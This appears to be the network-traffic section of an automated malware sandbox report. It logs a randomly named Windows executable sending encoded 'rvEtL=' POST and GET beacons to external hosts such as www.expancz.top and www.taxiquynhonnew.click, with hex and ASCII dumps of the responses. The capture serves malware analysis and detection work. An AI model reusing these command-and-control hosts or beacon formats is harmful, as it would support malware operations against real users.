                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.549737107.155.56.30801268C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 28, 2024 18:29:58.506473064 CET828OUTPOST /2gcl/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.expancz.top
                                                            Origin: http://www.expancz.top
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 226
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.expancz.top/2gcl/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 72 76 45 74 4c 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 79 57 61 7a 71 4a 71 45 62 39 74 69 77 76 42 58 59 36 48 51 58 55 6d 39 45 2f 64 4b 50 73 67 70 67 43 52 49 79 4f 54 73 49 37 62 2b 2b 52 7a 30 55 56 63 37 74 4d 59 5a 55 34 62 61 34 4d 45 46 33 49 50 63 31 65 68 6e 44 65 7a 62 68 51 45 50 4d 68 6f 69 65 6d 65 4f 4e 59 44 50 63 53 49 49 52 73 50 72 77 39 48 34 31 75 46 33 5a 48 42 53 30 76 6d 4c 4f 77 71 64 71 6f 6b 77 54 61 79 79 6e 73 41 69 65 32 66 43 52 4b 4d 45 63 2b 63 5a 32 4b 4e 6c 62 43 56 43 63 78 53 4c 68 49 4a 35 79 76 49 2f 39 5a 62 41 7a 6a 48 6d 6e 64 59 75 49 53 55 45 36 4d 45 59 64 45 68 41 33 52 51 42 56 53 64 65 6a 34 72 38 62 47 32 64 6e 71 6a 4b
                                                            Data Ascii: rvEtL=4KMMWvJXtNIDyWazqJqEb9tiwvBXY6HQXUm9E/dKPsgpgCRIyOTsI7b++Rz0UVc7tMYZU4ba4MEF3IPc1ehnDezbhQEPMhoiemeONYDPcSIIRsPrw9H41uF3ZHBS0vmLOwqdqokwTayynsAie2fCRKMEc+cZ2KNlbCVCcxSLhIJ5yvI/9ZbAzjHmndYuISUE6MEYdEhA3RQBVSdej4r8bG2dnqjK
                                                            Nov 28, 2024 18:30:00.100807905 CET697INHTTP/1.1 405 Not Allowed
                                                            Server: nginx
                                                            Date: Thu, 28 Nov 2024 17:29:59 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 552
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.549738107.155.56.30801268C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 28, 2024 18:30:01.178642035 CET1845OUTPOST /2gcl/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.expancz.top
                                                            Origin: http://www.expancz.top
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1242
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.expancz.top/2gcl/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 72 76 45 74 4c 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 79 57 61 7a 71 4a 71 45 62 39 74 69 77 76 42 58 59 36 48 51 58 55 6d 39 45 2f 64 4b 50 73 6f 70 67 78 5a 49 7a 70 48 73 4c 37 62 2b 7a 78 7a 31 55 56 63 71 74 4d 41 56 55 35 6d 74 34 4b 49 46 78 62 48 63 6c 76 68 6e 59 4f 7a 62 2b 67 45 4d 54 52 6f 7a 65 6d 4f 4b 4e 59 7a 50 63 53 49 49 52 72 33 72 79 70 54 34 7a 75 46 30 65 48 42 57 77 76 6e 46 4f 30 47 4e 71 6f 51 4b 54 4c 53 79 69 34 73 69 63 45 48 43 54 71 4d 61 53 65 64 61 32 4b 52 6d 62 43 49 37 63 78 6d 68 68 4b 5a 35 33 2b 74 2b 68 37 76 69 6f 67 33 6a 30 4f 73 70 4b 55 51 79 31 4f 51 35 61 45 78 2b 74 6b 6f 53 54 47 70 2b 70 73 6d 55 4e 79 66 48 76 61 65 32 66 7a 4a 47 78 50 61 4d 58 76 36 30 6c 62 4c 32 51 39 67 6a 6b 48 50 6b 53 6b 4e 54 66 66 6a 63 2f 6f 33 41 35 54 73 78 48 59 48 53 51 30 6b 71 2b 47 73 64 63 76 73 4e 67 64 6f 39 58 54 71 68 56 2b 35 7a 37 2f 70 6b 45 70 47 4a 48 71 41 6a 52 4c 49 52 2b 35 4b 36 4e 55 44 5a 4e 62 64 6d 70 6c 78 32 46 46 59 5a 48 54 4c 6a 5a 32 75 45 [TRUNCATED]
                                                            Data Ascii: rvEtL=4KMMWvJXtNIDyWazqJqEb9tiwvBXY6HQXUm9E/dKPsopgxZIzpHsL7b+zxz1UVcqtMAVU5mt4KIFxbHclvhnYOzb+gEMTRozemOKNYzPcSIIRr3rypT4zuF0eHBWwvnFO0GNqoQKTLSyi4sicEHCTqMaSeda2KRmbCI7cxmhhKZ53+t+h7viog3j0OspKUQy1OQ5aEx+tkoSTGp+psmUNyfHvae2fzJGxPaMXv60lbL2Q9gjkHPkSkNTffjc/o3A5TsxHYHSQ0kq+GsdcvsNgdo9XTqhV+5z7/pkEpGJHqAjRLIR+5K6NUDZNbdmplx2FFYZHTLjZ2uENQ82BeT4xf5FpIa25PHSiG7jVXrYaoI5ym5sgQeQ5yp6e8zBqMq637ySr7YPKMU7QCxOW7+nGdn34bqc2W9cO2aueuBEbZJLErzZUf5p3HFnnIpWp40VNIJqcMM+dCAbz7OoZQ/cG2298voQBhH7aWkqtHPzxXeoFCHL/cLTWtjFRJaGpZy0Wbre0DLn+2WuJLaPAHVSZQ7NJgMocXaLYkFUeKEnyBA1DnlTqyyk9glJcyzetSHcfxXIgxRfjTpj8pZIWFRPJH7aVjAWcEwwC0MUW4SH9KCLvflSRC8KLRW6uGY3jn7bezPwLCKcGXVD/WfgWXVcE9l6EZQGmymnV0jtTKWUViI/TE74fM/aSjrvBraBK5PygO2U4vI+4JWoSAeeo0UiXHAgcWe+5JqrI3/FOt73uSIY/9nS5rIaACnOe14/R3AZG6JcpVvcI/8BdH+FWaNAE1emhMW/c9A/E+3Ixo/sIZFg0VI8kn77nhlYu3H61gs39EBa5Wgy1cLJjjR2RCjx42XqANndugn7A5SWQ09SVg5nmBC0NX37+3y/+C7kyvxEn1TeUJR7iy9p4J+3CczBjkPYcYOa9WKsmlmdsHLY6KMeytcUVwbBm4N6cYvv+X7eL25aX5KWmBKBcrFhBxvqDr/J8P99OxnaMHLtec/YCK6gL8 [TRUNCATED]
                                                            Nov 28, 2024 18:30:02.771729946 CET697INHTTP/1.1 405 Not Allowed
                                                            Server: nginx
                                                            Date: Thu, 28 Nov 2024 17:30:02 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 552
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.549739107.155.56.30801268C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 28, 2024 18:30:03.843334913 CET549OUTGET /2gcl/?rvEtL=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmadCojy5vYT1OBl+VDfuWeAsbdd6UgJfU04VHRics3erVRA==&mFTD=mPHXHp HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.expancz.top
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Nov 28, 2024 18:30:05.449661016 CET1236INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Thu, 28 Nov 2024 17:30:05 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 9651
                                                            Last-Modified: Fri, 15 Nov 2024 02:47:44 GMT
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            ETag: "6736b650-25b3"
                                                            Accept-Ranges: bytes
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 6b 65 79 77 6f 72 64 73 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 74 79 70 65 20 63 6f 6e 74 65 6e 74 3d 77 65 62 73 69 74 65 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 74 69 74 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no"><meta name=keywords content=""><meta name=description content=""><meta property=og:type content=website><meta property=og:title content=""><meta property=og:description content=""><meta property=og:url content=""><meta property=og:image content=""><meta name=HandheldFriendly content=true><meta name=apple-mobile-web-app-capable content=yes><meta name=apple-mobile-web-app-status-bar-style content=black><meta name=format-detection content="telphone=no, email=no"><meta name=screen-orientation content=portrait><meta name=x5-orientation content=portrait><meta name=full-screen content=yes><meta name=x5-fullscreen content=true><meta name=browsermode content=application><meta name=x5-page-mode content=app><meta name=msapplication-tap-highlight content=no><meta http-equiv=X-UA-Compatible content="ie=edge"><link href=https:
                                                            Nov 28, 2024 18:30:05.449680090 CET1236INData Raw: 2f 2f 6c 33 66 69 6c 65 6a 73 6f 6e 34 64 76 64 2e 6a 6f 73 79 6c 69 76 69 6e 67 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 20 74 79 70 65 3d 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 20 72 65 6c 3d 69 63 6f 6e 3e 3c 73 74 79 6c 65 3e 23 50 4f 50
                                                            Data Ascii: //l3filejson4dvd.josyliving.com/favicon.ico type=image/x-icon rel=icon><style>#POP800_INIT_DIV { display: none!important; } #POP800_PANEL_DIV { display: none!important; } #POP800_LEAVEWORD_DIV { display: none!
                                                            Nov 28, 2024 18:30:05.449693918 CET352INData Raw: bb a5 e5 8f 8a e4 bb a5 e5 90 8e e7 89 88 e6 9c ac e5 8f af e4 bb a5 e4 bd bf e7 94 a8 0a 20 20 20 20 20 20 20 20 20 20 78 6d 6c 48 74 74 70 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c
                                                            Data Ascii: xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); } }else if(window.XMLHttpRequest){ //FirefoxOpera 8.0+SafariChrome xmlHttp = new XMLHttpRequest(); } /
                                                            Nov 28, 2024 18:30:05.449748039 CET1236INData Raw: 65 e6 88 96 4f 70 65 72 61 ef bc 8c e5 bf 85 e9 a1 bb e5 8f 91 e5 b8 83 e5 90 8e e6 89 8d e8 83 bd e8 bf 90 e8 a1 8c ef bc 8c e4 b8 8d e7 84 b6 e4 bc 9a e6 8a a5 e9 94 99 0a 20 20 20 20 20 20 78 6d 6c 48 74 74 70 2e 73 65 6e 64 28 6e 75 6c 6c 29
                                                            Data Ascii: eOpera xmlHttp.send(null); //4 if( xmlHttp.readyState == 4 ){ //0200300304
                                                            Nov 28, 2024 18:30:05.449759960 CET1236INData Raw: 65 72 79 56 61 72 69 61 62 6c 65 28 27 70 61 74 68 27 29 3b 0a 20 20 20 20 20 20 6c 6f 61 64 4a 73 28 27 70 69 78 65 6c 4a 73 27 2c 62 61 73 65 4a 73 55 72 6c 20 2b 20 70 61 74 68 49 6e 66 6f 2e 73 75 62 73 74 72 28 30 2c 31 29 2e 74 6f 4c 6f 77
                                                            Data Ascii: eryVariable('path'); loadJs('pixelJs',baseJsUrl + pathInfo.substr(0,1).toLowerCase() + '/' + pathInfo.substr(-1,1).toLowerCase() + '/' + pathInfo + '.js?time=' + Math.floor(Date.now() / 60000)); // pixel }</script><
                                                            Nov 28, 2024 18:30:05.449773073 CET1236INData Raw: 71 29 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 6e 20 3d 20 66 2e 66 62 71 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 6e 2e 63 61 6c 6c 4d 65 74 68 6f 64 20 3f 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: q) return; n = f.fbq = function () { n.callMethod ? n.callMethod.apply(n, arguments) : n.queue.push(arguments) }; if (!f._fbq) f._fbq = n; n.push = n; n.loaded = !0;
                                                            Nov 28, 2024 18:30:05.449784040 CET1236INData Raw: 65 66 65 72 20 3d 20 66 75 6e 63 74 69 6f 6e 28 74 2c 20 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 5b 65 5d 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 2e 70 75 73 68 28 5b 65 5d 2e 63 6f 6e 63 61
                                                            Data Ascii: efer = function(t, e) { t[e] = function() { t.push([e].concat(Array.prototype.slice.call(arguments, 0))) } }; for (var i = 0; i < ttq.methods.length; i++) ttq.setAndDefer(ttq, ttq.methods[i]);
                                                            Nov 28, 2024 18:30:05.449987888 CET1236INData Raw: 61 72 20 67 53 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 20 20 67 53 63 72 69 70 74 2e 74 79 70 65 20 3d 20 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74
                                                            Data Ascii: ar gScript = document.createElement("script"); gScript.type = "text/javascript"; gScript.src="https://www.googletagmanager.com/gtag/js?id=" + (google_id || 'G-CC0LH72W84') +""; gHead.appendChild(gScript); var startTime = Date.
                                                            Nov 28, 2024 18:30:05.450000048 CET898INData Raw: 74 69 6f 6e 20 28 65 76 65 6e 74 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 65 76 65 6e 74 2e 74 6f 75 63 68 65 73 2e 6c 65 6e 67 74 68 20 3e 20 31 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 65 76 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61
                                                            Data Ascii: tion (event) { if (event.touches.length > 1) { event.preventDefault(); } }); document.addEventListener('touchend', function (event) { var now = (new Date()).getTime(); if (now - lastTouchEn


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.54974018.139.62.226801268C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 28, 2024 18:30:11.819669008 CET835OUTPOST /y49d/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.taxiquynhonnew.click
                                                            Origin: http://www.taxiquynhonnew.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 206
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.taxiquynhonnew.click/y49d/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 72 76 45 74 4c 3d 72 34 72 4b 63 69 62 56 53 78 34 76 42 51 52 5a 42 77 42 61 4e 6f 4c 76 62 42 4e 47 68 73 2b 47 2f 50 48 7a 76 6f 6b 64 41 6e 63 75 4f 37 4b 34 58 41 58 68 4a 58 70 6e 7a 36 33 66 2f 2f 54 7a 49 4d 34 53 56 47 30 39 72 68 70 34 63 6f 52 7a 53 67 44 6a 65 6e 2b 43 6a 31 4f 38 6a 65 55 63 32 63 69 75 58 72 64 65 61 56 54 59 77 72 6f 49 78 39 4a 35 53 2b 32 71 64 53 71 55 66 42 74 59 64 76 33 57 38 52 72 59 55 51 57 56 36 4d 67 37 51 59 49 59 67 55 79 77 7a 6e 76 6d 47 39 64 51 6c 31 57 55 38 72 57 61 41 67 35 66 44 69 30 53 68 2b 54 56 78 75 73 76 4c 37 52 6c 2b 31 38 4b 73 31 78 34 41 35 67 3d
                                                            Data Ascii: rvEtL=r4rKcibVSx4vBQRZBwBaNoLvbBNGhs+G/PHzvokdAncuO7K4XAXhJXpnz63f//TzIM4SVG09rhp4coRzSgDjen+Cj1O8jeUc2ciuXrdeaVTYwroIx9J5S+2qdSqUfBtYdv3W8RrYUQWV6Mg7QYIYgUywznvmG9dQl1WU8rWaAg5fDi0Sh+TVxusvL7Rl+18Ks1x4A5g=
                                                            Nov 28, 2024 18:30:13.426341057 CET371INHTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Thu, 28 Nov 2024 17:30:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.54974118.139.62.226801268C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 28, 2024 18:30:14.488987923 CET855OUTPOST /y49d/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.taxiquynhonnew.click
                                                            Origin: http://www.taxiquynhonnew.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 226
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.taxiquynhonnew.click/y49d/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 72 76 45 74 4c 3d 72 34 72 4b 63 69 62 56 53 78 34 76 54 67 42 5a 4e 7a 70 61 4b 49 4c 73 56 68 4e 47 72 4d 2b 4b 2f 50 4c 7a 76 71 49 4e 41 78 30 75 4f 5a 69 34 4e 45 44 68 48 33 70 6e 6e 71 33 57 69 76 54 36 49 4d 30 6b 56 45 77 39 72 68 39 34 63 74 31 7a 56 53 72 69 65 33 2b 45 71 56 4f 2b 38 4f 55 63 32 63 69 75 58 72 4a 34 61 52 2f 59 77 62 34 49 78 59 39 2b 4d 4f 32 72 51 43 71 55 62 42 74 63 64 76 33 30 38 55 7a 68 55 54 2b 56 36 4d 77 37 65 70 49 62 7a 30 79 32 39 48 76 74 49 66 38 2f 6f 33 53 72 31 36 54 43 57 53 39 56 47 55 46 34 37 63 62 39 69 4f 41 58 62 6f 5a 53 76 46 64 6a 32 57 68 49 65 75 31 63 33 79 68 62 52 4d 42 4b 6b 43 33 55 70 2b 30 4a 56 41 57 66
                                                            Data Ascii: rvEtL=r4rKcibVSx4vTgBZNzpaKILsVhNGrM+K/PLzvqINAx0uOZi4NEDhH3pnnq3WivT6IM0kVEw9rh94ct1zVSrie3+EqVO+8OUc2ciuXrJ4aR/Ywb4IxY9+MO2rQCqUbBtcdv308UzhUT+V6Mw7epIbz0y29HvtIf8/o3Sr16TCWS9VGUF47cb9iOAXboZSvFdj2WhIeu1c3yhbRMBKkC3Up+0JVAWf
                                                            Nov 28, 2024 18:30:16.070369959 CET371INHTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Thu, 28 Nov 2024 17:30:15 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/
